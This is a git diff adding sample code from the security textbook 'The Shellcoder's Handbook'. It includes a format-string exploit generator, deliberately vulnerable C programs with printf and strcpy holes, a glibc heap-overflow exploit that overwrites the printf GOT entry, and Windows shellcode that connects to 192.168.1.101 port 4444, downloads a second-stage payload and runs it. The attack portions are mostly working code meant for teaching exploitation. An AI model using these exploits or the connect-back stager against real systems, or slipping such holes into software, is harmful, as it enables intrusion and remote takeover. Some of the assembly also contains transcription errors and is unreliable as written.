+            if( !safe_strcat( buff, tmp, buff_size )) 
+                    return err("Oops. Buffer too small.");
+
+            addr += 2;
+
+            num_so_far += 4;
+     }
+
+     printf( "%s\n", buff );
+     
+     // now upload the string 2 bytes at a time. Make sure that num_so_far is appropriate by doing %2000x or whatever.
+     psz = string_to_upload;
+
+     while( (*psz != 0) && (*(psz+1) != 0) )
+     {
+            // how many chars to print to make (so_far % 64k)==s
+            // 
+            s = *(unsigned short *)psz;
+
+            num_so_far_mod = num_so_far &0xffff;
+
+            num_to_print = 0;
+            
+            if( num_so_far_mod < s )
+                    num_to_print = s - num_so_far_mod;
+            else
+                    if( num_so_far_mod > s )
+                          num_to_print = 0x10000 - (num_so_far_mod - s);
+     
+            // if num_so_far_mod and s are equal, we'll 'output' s any-way :o)
+            num_so_far += num_to_print;
+
+            // print the difference in characters
+            if( num_to_print > 0 )
+            {
+                    sprintf( tmp, "%%%dx", num_to_print );
+                    if(!safe_strcat( buff, tmp, buff_size ))
+                           return err("Buffer too small.");
+            }
+
+            // now upload the 'short' value
+            sprintf( tmp, "%%%d$hn", param_num );
+            if( !safe_strcat( buff, tmp, buff_size ))
+                    return err("Buffer too small.");
+            
+            psz += 2;
+            param_num++;
+     }
+     
+     printf( "%s\n", buff );
+
+     sprintf( tmp, "./dowu localhost $'%s' 1\n", buff );
+
+     system( tmp );
+     
+     return 0;
+}
+
+
+
+
+
+
+
diff --git a/Chapter_04/Shellcoders04sampleprogram01.c b/Chapter_04/Shellcoders04sampleprogram01.c
new file mode 100644
index 0000000..ecadd95
--- /dev/null
+++ b/Chapter_04/Shellcoders04sampleprogram01.c
@@ -0,0 +1,47 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 4: Introduction to Format String Bugs
+Sample Program #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdlib.h>
+#include <stdio.h>
+
+int main( int argc, char *argv[] )
+{
+     int c;
+
+     printf( "Decimal Hex Character\n" );
+     printf( "======= === =========\n" );
+
+     for( c = 0x20; c < 256; c++ )
+     {
+            switch( c )
+            {
+                    case 0x0a:
+                    case 0x0b:
+                    case 0x0c:
+                    case 0x0d:
+                    case 0x1b:
+                           printf( " %03d %02x \n", c, c );
+                           break;
+                    default:
+                           printf( " %03d %02x %c\n", c, c, c );
+                           break;
+             } 
+     } 
+
+     return 1;
+}
+
+
+
diff --git a/Chapter_04/Shellcoders04sampleprogram02.c b/Chapter_04/Shellcoders04sampleprogram02.c
new file mode 100644
index 0000000..5fd40bf
--- /dev/null
+++ b/Chapter_04/Shellcoders04sampleprogram02.c
@@ -0,0 +1,35 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 4: Introduction to Format String Bugs
+Sample Program #2
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+
+int main( int argc, char *argv[] )
+{
+        if( argc != 2 )
+        {
+                printf("Error - supply a format string please\n");
+                return 1;
+        }
+
+        printf( argv[1] );
+        printf( "\n" );
+
+        return 0;
+}
+
+
+
+
diff --git a/Chapter_04/Shellcoders04sampleprogram03.c b/Chapter_04/Shellcoders04sampleprogram03.c
new file mode 100644
index 0000000..65923e7
--- /dev/null
+++ b/Chapter_04/Shellcoders04sampleprogram03.c
@@ -0,0 +1,38 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 4: Introduction to Format String Bugs
+Sample Program #3
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+  #include <stdio.h>
+  #include <stdlib.h>
+
+  int main()
+  {
+          asm("\
+                  xor %eax, %eax;\
+                  xor %ecx, %ecx;\
+                  xor %edx, %edx;\
+                  mov $0x01, %al;\
+                  xor %ebx, %ebx;\
+                  mov $0x02, %bl;\
+                  int $0x80;\
+                  ");
+
+          return 1;
+  }
+
+
+
+
+
+
diff --git a/Chapter_05/Shellcoders05codesnippet01.c b/Chapter_05/Shellcoders05codesnippet01.c
new file mode 100644
index 0000000..e8bb6c8
--- /dev/null
+++ b/Chapter_05/Shellcoders05codesnippet01.c
@@ -0,0 +1,58 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 5: Heap Overflows
+Code Snippet #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+bin = bin_at(av, idx);
+
+      for (victim = last(bin); victim != bin; victim = victim->bk) {
+      size = chunksize(victim);
+
+      if ((unsigned long)(size) >= (unsigned long)(nb)) {
+       remainder_size = size - nb;
+       unlink(victim, bck, fwd);
+
+       /* Exhaust */
+
+       if (remainder_size < MINSIZE)  {
+         set_inuse_bit_at_offset(victim, size);
+         if (av != &main_arena)
+           victim->size |= NON_MAIN_ARENA;
+         check_malloced_chunk(av, victim, nb);
+         return chunk2mem(victim);
+       }
+
+       /* Split */
+
+       else {
+         remainder = chunk_at_offset(victim, nb);
+         unsorted_chunks(av)->bk = unsorted_chunks(av)->fd = remainder;
+         remainder->bk = remainder->fd = unsorted_chunks(av);
+         set_head(victim, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+         set_head(remainder, remainder_size | PREV_INUSE);
+         set_foot(remainder, remainder_size);
+         check_malloced_chunk(av, victim, nb);
+         return chunk2mem(victim);
+       }
+     }
+      }
+
+
+
+
+
+
+
+
+
+
diff --git a/Chapter_05/Shellcoders05heapexploit01.c b/Chapter_05/Shellcoders05heapexploit01.c
new file mode 100644
index 0000000..3a26f50
--- /dev/null
+++ b/Chapter_05/Shellcoders05heapexploit01.c
@@ -0,0 +1,149 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 5: Heap Overflows
+Heap Exploit #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#define VULN "./heap2"
+
+#define XLEN 1040 /* 1024 + 16 */
+#define ENVPTRZ 512 /* enough to hold our big layout */
+
+/* mov %ecx,0x8(PRINTF_GOT) */
+
+#define PRINTF_GOT 0x08049648 - 8 
+
+/* 13 and 21 work for Mandrake 9, glibc 2.2.5 - you may want to modify these until you point directly at 0x408 (or 0xfffffffc, for certain glibc's). Also, your address must be "clean" meaning not have lower bits set. 0xf0 is clean, 0xf1 is not. */
+
+#define CHUNK_ENV_ALLIGN 17 
+#define CHUNK_ENV_OFFSET 1056-1024
+
+/* Handy environment loader */
+
+unsigned int
+ptoa(char **envp, char *string, unsigned int total_size)
+{
+  char *p;
+  unsigned int cnt;   
+  unsigned int size;
+  unsigned int i;
+
+  p = string;
+  cnt = size = i = 0;
+  for (cnt = 0; size < total_size; cnt ++) 
+  {
+    envp[cnt] = (char *) malloc(strlen(p) + 1);
+    envp[cnt] = strdup(p);
+
+#ifdef DEBUG
+
+    fprintf(stderr, "[*] strlen: %d\n", strlen(p) + 1);
+    for (i = 0; i < strlen(p) + 1; i ++) fprintf(stderr, "[*] %d: 0x%.02x\n", i, p[i]);
+
+#endif
+
+    size += strlen(p) + 1;
+    p += strlen(p) + 1;
+  }
+  return cnt;
+}
+
+
+int main(int argc, char **argv)
+{
+  unsigned char *x;
+  char *ownenv[ENVPTRZ];
+  unsigned int xlen;
+  unsigned int i;
+  unsigned char chunk[2048 + 1]; 
+
+  /* 2 times 1024 to have enough controlled mem to survive the orl */
+
+  unsigned char *exe[3];
+  unsigned int env_size;
+  unsigned long retloc;
+  unsigned long retval;
+  unsigned int chunk_env_offset;
+  unsigned int chunk_env_align;
+
+  xlen = XLEN + (1024 - (XLEN - 1024));
+  chunk_env_offset = CHUNK_ENV_OFFSET; 
+  chunk_env_align = CHUNK_ENV_ALLIGN;   
+  exe[0] = VULN;
+  exe[1] = x = malloc(xlen + 1);
+  exe[2] = NULL;
+  if (!x) exit(-1);
+
+  fprintf(stderr, "\n[*] Options: [ <environment chunk alignment> ] [ <enviroment chunk offset> ]\n\n");
+  if (argv[1] && (argc == 2 || argc == 3)) chunk_env_align = atoi(argv[1]); 
+  if (argv[2] && argc == 3) chunk_env_offset = atoi(argv[2]); 
+  fprintf(stderr, "[*] using align %d and offset %d\n", chunk_env_align, chunk_env_offset);
+  retloc = PRINTF_GOT; 
+
+  /* printf GOT - 0x8 ... this is where ecx gets written to, ecx is a chunk ptr */ 
+  /*where we want to jump do, if glibc 2.2 – just anywhere on the stack is good for a demonstration */
+
+  retval=0xbffffd40;
+  fprintf(stderr, "[*] Using retloc: %p\n", retloc);
+  memset(chunk, 0x00, sizeof(chunk));
+  for (i = 0; i < chunk_env_align; i ++) chunk[i] = 'X';
+  for (i = chunk_env_align; i <= sizeof(chunk) - (16 + 1); i += (16))
+  {
+    *(long *)&chunk[i] = 0xfffffffc; 
+    *(long *)&chunk[i + 4] = (unsigned long)1032; /* S == chunksize(FD) ... breaking loop (size == 1024 + 8) */ 
+    /*retval is not used for 2.3 exploitation...*/
+    *(long *)&chunk[i + 8] = retval; 
+    *(long *)&chunk[i + 12] = retloc; /* printf GOT - 8..mov %ecx,0x8(%eax) */
+  }
+
+#ifdef DEBUG
+
+  for (i = 0; i < sizeof(chunk); i++) fprintf (stderr, "[*] %d: 0x%.02x\n", i, chunk[i]);
+
+#endif
+  memset(x, 0xcc, xlen);
+  *(long *)&x[XLEN - 16] = 0xfffffffc;
+  *(long *)&x[XLEN - 12] = 0xfffffff0;
+  /* we point both fd and bk to our fake chunk tag ... so whichever gets used is ok with us */
+
+  /*we subtract 1024 since our buffer is 1024 long and we need to have space for writes after it...
+   * you'll see when you trace through this. */
+
+  *(long *)&x[XLEN - 8] = ((0xc0000000 - 4) - strlen(exe[0]) - chunk_env_offset-1024);  
+  *(long *)&x[XLEN - 4] = ((0xc0000000 - 4) - strlen(exe[0]) - chunk_env_offset-1024);
+  printf("Our fake chunk (0xfffffffc) needs to be at %p\n",((0xc0000000 - 4) - strlen(exe[0]) - chunk_env_offset)-1024);
+
+  /*you could memcpy shellcode into x somewhere, and you would be able to jmp directly into it – otherwise it will just execute whatever is on the stack – most likely nothing good. (for glibc 2.2) */
+
+  /* clear our enviroment array */
+
+  for (i = 0; i < ENVPTRZ; i++) ownenv[i] = NULL; 
+  i = ptoa(ownenv, chunk, sizeof(chunk));
+  fprintf(stderr, "[*] Size of enviroment array: %d\n", i);
+  fprintf(stderr, "[*] Calling: %s\n\n", exe[0]);
+
+  if (execve(exe[0], (char **)exe, (char **)ownenv)) 
+  {
+    fprintf(stderr, "Error executing %s\n", exe[0]);
+    free(x);
+    exit(-1); 
+  }
+}
+
+
+
+
diff --git a/Chapter_05/Shellcoders05sampleprogram01.c b/Chapter_05/Shellcoders05sampleprogram01.c
new file mode 100644
index 0000000..a1f4711
--- /dev/null
+++ b/Chapter_05/Shellcoders05sampleprogram01.c
@@ -0,0 +1,34 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 5: Heap Overflows
+Sample Program #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+/*notvuln.c*/
+
+int 
+main(int argc, char** argv) {
+
+  char *buf;
+  buf=(char*)malloc(1024);
+  printf("buf=%p",buf);
+  strcpy(buf,argv[1]);
+  free(buf);
+
+}
+
+
+
+
+
+
+
diff --git a/Chapter_05/Shellcoders05sampleprogram02.c b/Chapter_05/Shellcoders05sampleprogram02.c
new file mode 100644
index 0000000..f7ab79f
--- /dev/null
+++ b/Chapter_05/Shellcoders05sampleprogram02.c
@@ -0,0 +1,36 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 5: Heap Overflows
+Sample Program #2
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+/*basicheap.c*/
+
+int main(int argc, char** argv) {
+
+  char *buf;
+  char *buf2;
+  buf=(char*)malloc(1024);
+  buf2=(char*)malloc(1024);
+  printf("buf=%p buf2=%p\n",buf,buf2);
+  strcpy(buf,argv[1]);
+  free(buf2);
+
+}
+
+
+
+
+
+
+
+
diff --git a/Chapter_05/Shellcoders05sampleprogram03.c b/Chapter_05/Shellcoders05sampleprogram03.c
new file mode 100644
index 0000000..b188c2a
--- /dev/null
+++ b/Chapter_05/Shellcoders05sampleprogram03.c
@@ -0,0 +1,41 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 5: Heap Overflows
+Sample Program #3
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+/*heap2.c – a vulnerable program that calls malloc() */
+
+int main(int argc, char **argv)
+
+{
+
+ char * buf,*buf2,*buf3;
+
+ buf=(char*)malloc(1024);
+ buf2=(char*)malloc(1024);
+ buf3=(char*)malloc(1024);
+ free(buf2);
+ strcpy(buf,argv[1]);
+ buf2=(char*)malloc(1024); //this was a free() in the previous example
+ printf(“Done.”); //we will use this to take control in our exploit
+
+}
+
+
+
+
+
+
+
+
+
diff --git a/Chapter_06/Shellcoders06codesnippet01.c b/Chapter_06/Shellcoders06codesnippet01.c
new file mode 100644
index 0000000..e158b1f
--- /dev/null
+++ b/Chapter_06/Shellcoders06codesnippet01.c
@@ -0,0 +1,49 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 6: Wild World of Windows
+Sample Program #3
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+[ uuid(e33c0cc4-0482-101a-bc0c-02608c6ba218),
+  version(1.0),
+  implicit_handle(handle_t rpc_binding)
+] interface ???
+
+{
+  typedef struct {
+    TYPE_2 element_1;
+    TYPE_3 element_2;
+  } TYPE_1;
+
+...
+
+  short Function_00(
+        [in] long element_9,
+        [in] [unique] [string] wchar_t *element_10,
+        [in] [unique] TYPE_1 *element_11,
+        [in] [unique] TYPE_1 *element_12,
+        [in] [unique] TYPE_2 *element_13,
+        [in] long element_14,
+        [in] long element_15,
+       [out] [context_handle] void *element_16
+  );
+
+
+
+
+
+
+
+
+
+
+
diff --git a/Chapter_07/Shellcoders07sampleprogram01.c b/Chapter_07/Shellcoders07sampleprogram01.c
new file mode 100644
index 0000000..e6cdf40
--- /dev/null
+++ b/Chapter_07/Shellcoders07sampleprogram01.c
@@ -0,0 +1,726 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 7: Windows Shellcode
+Sample Program #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+//released under the GNU PUBLIC LICENSE v2.0
+#include <stdio.h>
+#include <malloc.h>
+#ifdef Win32
+#include <windows.h> 
+#endif
+
+void
+getprocaddr()
+{
+
+  /*GLOBAL DEFINES*/
+  asm("
+
+.set KERNEL32HASH,      0x000d4e88
+.set NUMBEROFKERNEL32FUNCTIONS,0x4
+.set VIRTUALPROTECTHASH, 0x38d13c
+.set GETPROCADDRESSHASH,0x00348bfa
+.set LOADLIBRARYAHASH,  0x000d5786
+.set GETSYSTEMDIRECTORYAHASH, 0x069bb2e6
+.set WS232HASH,         0x0003ab08
+.set NUMBEROFWS232FUNCTIONS,0x5
+.set CONNECTHASH,       0x0000677c
+.set RECVHASH,          0x00000cc0
+.set SENDHASH,          0x00000cd8
+.set WSASTARTUPHASH,    0x00039314
+.set SOCKETHASH,        0x000036a4
+.set MSVCRTHASH, 0x00037908
+.set NUMBEROFMSVCRTFUNCTIONS, 0x01
+.set FREEHASH, 0x00000c4e
+.set ADVAPI32HASH, 0x000ca608
+.set NUMBEROFADVAPI32FUNCTIONS, 0x01
+.set REVERTTOSELFHASH, 0x000dcdb4
+
+");
+
+/*START OF SHELLCODE*/
+asm("
+
+mainentrypoint:
+call geteip
+geteip:
+pop %ebx
+movl %ebx,%esp
+subl $0x1000,%esp
+and $0xffffff00,%esp
+
+//set up them loop
+
+movl $NUMBEROFKERNEL32FUNCTIONS,%ecx
+lea  KERNEL32HASHESTABLE-geteip(%ebx),%esi
+lea  KERNEL32FUNCTIONSTABLE-geteip(%ebx),%edi
+
+//run the loop
+
+getkernel32functions:
+
+//push the hash we are looking for, which is pointed to by %esi
+
+pushl (%esi)
+pushl $KERNEL32HASH
+call getfuncaddress
+movl %eax,(%edi)
+addl $4, %edi
+addl $4, %esi
+loop getkernel32functions
+
+//GET MSVCRT FUNCTIONS
+
+movl $NUMBEROFMSVCRTFUNCTIONS,%ecx
+lea MSVCRTHASHESTABLE-geteip(%ebx),%esi
+lea MSVCRTFUNCTIONSTABLE-geteip(%ebx),%edi
+getmsvcrtfunctions:
+pushl (%esi)
+pushl $MSVCRTHASH
+call getfuncaddress
+movl %eax,(%edi)
+addl $4, %edi
+addl $4, %esi
+loop getmsvcrtfunctions
+
+//QUICKLY!
+//VIRTUALPROTECT FREE +rwx
+
+lea BUF-geteip(%ebx),%eax
+pushl %eax
+pushl $0x40
+pushl $50
+movl FREE-geteip(%ebx),%edx
+pushl %edx
+call *VIRTUALPROTECT-geteip(%ebx)
+
+//restore edx as FREE
+
+movl FREE-geteip(%ebx),%edx
+
+//overwrite it with return!
+
+movl $0xc3c3c3c3,(%edx)
+
+//we leave it +rwx
+//Now, we call the RevertToSelf() function so we can actually do some-thing on the machine
+//You can't read ws2_32.dll in the locator exploit without this.
+
+movl $NUMBEROFADVAPI32FUNCTIONS,%ecx
+lea ADVAPI32HASHESTABLE-geteip(%ebx),%esi
+lea ADVAPI32FUNCTIONSTABLE-geteip(%ebx),%edii                                                getadvapi32functions:
+pushl (%esi)
+pushl $ADVAPI32HASH
+call getfuncaddress
+movl %eax,(%edi)
+addl $4,%esi
+addl $4,%edi
+loop getadvapi32functions
+call *REVERTTOSELF-geteip(%ebx)
+
+//call getsystemdirectoryA, then prepend to ws2_32.dll
+
+pushl $2048
+lea BUF-geteip(%ebx),%eax
+pushl %eax
+call *GETSYSTEMDIRECTORYA-geteip(%ebx)
+
+//ok, now buf is loaded with the current working system directory
+//we now need to append \\WS2_32.DLL to that, because
+//of a bug in LoadLibraryA, which won't find WS2_32.DLL if there is a
+//dot in that path
+
+lea BUF-geteip(%ebx),%eax
+findendofsystemroot:
+cmpb $0,(%eax)
+je foundendofsystemroot
+inc %eax
+jmp findendofsystemroot
+foundendofsystemroot:
+
+//eax is now pointing to the final null of C:\\windows\\system32
+
+lea WS2_32DLL-geteip(%ebx),%esi
+strcpyintobuf:
+movb (%esi), %dl
+movb %dl,(%eax)
+test %dl,%dl
+jz donewithstrcpy
+inc %esi
+inc %eax
+jmp strcpyintobuf
+donewithstrcpy:
+
+//loadlibrarya(\"c:\\winnt\\system32\\ws2_32.dll\");
+
+lea BUF-geteip(%ebx),%edx
+pushl %edx
+call *LOADLIBRARY-geteip(%ebx)
+
+movl $NUMBEROFWS232FUNCTIONS,%ecx
+lea WS232HASHESTABLE-geteip(%ebx),%esi
+lea WS232FUNCTIONSTABLE-geteip(%ebx),%edi
+
+getws232functions:
+
+//get getprocaddress
+//hash of getprocaddress
+
+pushl (%esi)
+
+//push hash of KERNEL32.DLL
+
+pushl $WS232HASH
+call getfuncaddress
+movl %eax,(%edi)
+addl $4, %esi
+addl $4, %edi
+loop getws232functions
+
+//ok, now we set up BUFADDR on a quadword boundary
+//esp will do since it points far above our current position
+
+movl %esp,BUFADDR-geteip(%ebx)
+
+//done setting up BUFADDR
+
+movl BUFADDR-geteip(%ebx), %eax
+pushl %eax
+pushl $0x101
+call *WSASTARTUP-geteip(%ebx)
+
+//call socket
+
+pushl $6
+pushl $1
+pushl $2
+call *SOCKET-geteip(%ebx)
+movl %eax,FDSPOT-geteip(%ebx)
+
+//call connect
+//push addrlen=16
+
+push $0x10
+lea SockAddrSPOT-geteip(%ebx),%esi
+
+//the 4444 is our port
+
+pushl %esi
+
+//push fd
+
+pushl %eax
+call *CONNECT-geteip(%ebx)
+test %eax,%eax
+jl  exitthread
+
+pushl $4
+call recvloop
+//ok, now the size is the first word in BUF
+
+Now that we have the size, we read in that much shellcode into the buffer.
+movl BUFADDR-geteip(%ebx),%edx
+movl (%edx),%edx
+
+//now edx has the size
+
+push %edx
+
+//read the data into BUF
+
+call recvloop 
+
+//Now we just execute it.
+
+movl BUFADDR-geteip(%ebx),%edx
+call *%edx 
+
+//recvloop function
+
+ asm("
+
+//START FUNCTION RECVLOOP
+//arguments: size to be read
+//reads into *BUFADDR
+
+recvloop:
+pushl %ebp
+movl %esp,%ebp
+push %edx
+push %edi
+
+//get arg1 into edx
+
+movl 0x8(%ebp), %edx
+movl BUFADDR-geteip(%ebx),%edi
+
+callrecvloop:
+
+//not an argument- but recv() messes up edx! So we save it off here
+
+pushl %edx
+
+//flags
+
+pushl $0
+
+//len
+
+pushl $1
+
+//*buf
+
+pushl %edi
+movl FDSPOT-geteip(%ebx),%eax
+pushl %eax
+call *RECV-geteip(%ebx)
+
+//prevents getting stuck in an endless loop if the server closes the connection
+
+cmp $0xffffffff,%eax
+je exitthread
+
+
+popl %edx
+
+//subtract how many we read
+
+sub %eax,%edx
+
+//move buffer pointer forward
+
+add %eax,%edi
+
+//test if we need to exit the function
+//recv returned 0
+
+test %eax,%eax
+je donewithrecvloop
+
+//we read all the data we wanted to read
+
+test %edx,%edx
+je donewithrecvloop
+jmp callrecvloop
+
+
+donewithrecvloop:
+
+//done with recvloop
+
+pop %edi
+pop %edx
+mov %ebp, %esp
+pop %ebp
+ret $0x04
+
+//END FUNCTION
+
+/* fs[0x30] is pointer to PEB
+   *that + 0c is _PEB_LDR_DATA pointer
+   *that + 0c is in load order module list pointer
+
+*/
+
+//void* GETFUNCADDRESS( int hash1,int hash2)
+
+/*START OF CODE THAT GETS THE ADDRESSES*/
+//arguments
+//hash of dll
+//hash of function
+//returns function address
+
+getfuncaddress:
+pushl %ebp
+movl %esp,%ebp
+pushl %ebx
+pushl %esi
+pushl %edi
+pushl %ecx
+
+pushl %fs:(0x30)
+popl %eax
+
+//test %eax,%eax
+//JS WIN9X
+
+NT:
+
+//get _PEB_LDR_DATA ptr
+
+movl 0xc(%eax),%eax
+
+//get first module pointer list
+
+movl 0xc(%eax),%ecx
+
+
+
+nextinlist:
+
+//next in the list into %edx
+
+movl (%ecx),%edx
+
+//this is the unicode name of our module
+
+movl 0x30(%ecx),%eax
+
+//compare the unicode string at %eax to our string
+//if it matches KERNEL32.dll, then we have our module address at 0x18+%ecx
+//call hash match
+//push unicode increment value
+
+pushl $2
+
+//push hash
+
+movl 8(%ebp),%edi
+pushl %edi
+
+//push string address
+
+pushl %eax
+call hashit
+test %eax,%eax
+jz  foundmodule
+
+//otherwise check the next node in the list
+
+movl %edx,%ecx
+jmp nextinlist
+
+//FOUND THE MODULE, GET THE PROCEDURE
+
+foundmodule:
+
+//we are pointing to the winning list entry with ecx 
+//get the base address
+
+movl 0x18(%ecx),%eax
+
+//we want to save this off since this is our base that we will have to add 
+
+push %eax
+
+//ok, we are now pointing at the start of the module (the MZ for
+//the dos header IMAGE_DOS_HEADER.e_lfanew is what we want
+//to go parse (the PE header itself)
+
+movl 0x3c(%eax),%ebx
+addl %ebx,%eax
+
+//%ebx is now pointing to the PE header (ascii PE)
+//PE->export table is what we want
+//0x150-0xd8=0x78 according to OllydDbg
+
+movl 0x78(%eax),%ebx
+
+//eax is now the base again!
+
+pop %eax 
+push %eax
+addl %eax,%ebx
+
+//this eax is now the Export Directory Table
+//From MS PE-COFF table, 6.3.1 (search for pecoff at MS Site to download)
+//Offset Size Field                         Description
+//16     4    Ordinal Base (usually set to one!) 
+//24     4    Number of Name pointers       (also the number of ordi-nals)
+//28     4    Export Address Table RVA      Address of the EAT rela-tive to base
+//32     4    Name Pointer Table RVA        Addresses (RVA's) of Names!
+//36     4    Ordinal Table RVA             You need the ordinals to get the addresses
+
+//theoretically we need to subtract the ordinal base, but it turns out they don't actually use it
+
+//movl 16(%ebx),%edi
+//edi is now the ordinal base!
+
+movl 28(%ebx),%ecx
+
+//ecx is now the address table
+
+movl 32(%ebx),%edx
+
+//edx is the name pointer table
+
+movl 36(%ebx),%ebx
+
+//ebx is the ordinal table
+
+//eax is now the base address again
+//correct those RVA's into actual addresses
+
+addl %eax,%ecx
+addl %eax,%edx
+addl %eax,%ebx
+
+////HERE IS WHERE WE FIND THE FUNCTION POINTER ITSELF
+
+
+find_procedure:
+
+//for each pointer in the name pointer table, match against our hash
+//if the hash matches, then we go into the address table and get the
+//address using the ordinal table
+
+movl (%edx),%esi
+pop %eax
+pushl %eax
+addl %eax,%esi
+
+//push the hash increment - we are ascii
+
+pushl $1
+
+//push the function hash
+
+pushl 12(%ebp)
+
+//esi has the address of our actual string
+
+pushl %esi
+call hashit
+test %eax, %eax
+jz found_procedure
+
+//increment our pointer into the name table
+
+add $4,%edx
+
+//increment out pointer into the ordinal table
+//ordinals are only 16 bits
+
+add $2,%ebx 
+jmp find_procedure
+
+found_procedure:
+
+//set eax to the base address again
+
+pop %eax
+xor %edx,%edx
+
+//get the ordinal into dx
+//ordinal=ExportOrdinalTable[i] (pointed to by ebx)
+
+mov (%ebx),%dx
+
+//SymbolRVA = ExportAddressTable[ordinal-OrdinalBase]
+//see note above for lack of ordinal base use
+//subtract ordinal base
+//sub %edi,%edx
+//multiply that by sizeof(dword)
+
+shl $2,%edx
+
+//add that to the export address table (dereference in above .c statement)
+//to get the RVA of the actual address
+
+add %edx,%ecx
+
+//now add that to the base and we get our actual address
+
+add (%ecx),%eax
+
+//done eax has the address!
+
+popl %ecx
+popl %edi
+popl %esi
+popl %ebx
+mov %ebp,%esp
+pop %ebp
+ret $8
+
+//hashit function
+//takes 3 args
+//increment for unicode/ascii
+//hash to test against
+//address of string
+
+hashit:
+pushl %ebp
+movl %esp,%ebp
+
+push %ecx
+push %ebx
+push %edx
+
+xor %ecx,%ecx
+xor %ebx,%ebx
+xor %edx,%edx
+
+mov 8(%ebp),%eax
+hashloop:
+movb (%eax),%dl
+
+//convert char to upper case
+
+or $0x60,%dl
+add %edx,%ebx
+shl $1,%ebx
+
+//add increment to the pointer
+//2 for unicode, 1 for ascii
+
+addl 16(%ebp),%eax
+mov (%eax),%cl
+test %cl,%cl
+loopnz hashloop
+xor %eax,%eax
+mov 12(%ebp),%ecx
+cmp %ecx,%ebx
+jz donehash
+
+//failed to match, set eax==1
+
+inc %eax
+donehash:
+pop %edx
+pop %ebx
+pop %ecx
+mov %ebp,%esp
+pop %ebp
+ret $12
+
+exitthread:
+//just cause an exception
+xor %eax,%eax
+call *%eax
+
+SockAddrSPOT:
+
+//first 2 bytes are the PORT (then AF_INET is 0002)
+
+.long 0x44440002
+
+//server ip 651a8c0 is 192.168.1.101
+
+.long 0x6501a8c0
+KERNEL32HASHESTABLE:
+.long GETSYSTEMDIRECTORYAHASH
+.long VIRTUALPROTECTHASH
+.long GETPROCADDRESSHASH
+.long LOADLIBRARYAHASH
+
+MSVCRTHASHESTABLE:
+.long FREEHASH
+
+ADVAPI32HASHESTABLE:
+.long REVERTTOSELFHASH
+
+WS232HASHESTABLE:
+.long CONNECTHASH
+.long RECVHASH
+.long SENDHASH
+.long WSASTARTUPHASH
+.long SOCKETHASH
+
+WS2_32DLL:
+.ascii \"ws2_32.dll\"
+.long 0x00000000
+
+endsploit:
+
+//nothing below this line is actually included in the shellcode, but it
+//is used for scratch space when the exploit is running.
+
+MSVCRTFUNCTIONSTABLE:
+FREE:
+     .long 0x00000000
+
+KERNEL32FUNCTIONSTABLE:
+VIRTUALPROTECT:
+     .long 0x00000000
+GETPROCADDRA:
+     .long 0x00000000
+LOADLIBRARY:
+     .long 0x00000000
+
+//end of kernel32.dll functions table
+//this stores the address of buf+8 mod 8, since we
+//are not guaranteed to be on a word boundary, and we
+//want to be so Win32 api works
+
+BUFADDR: 
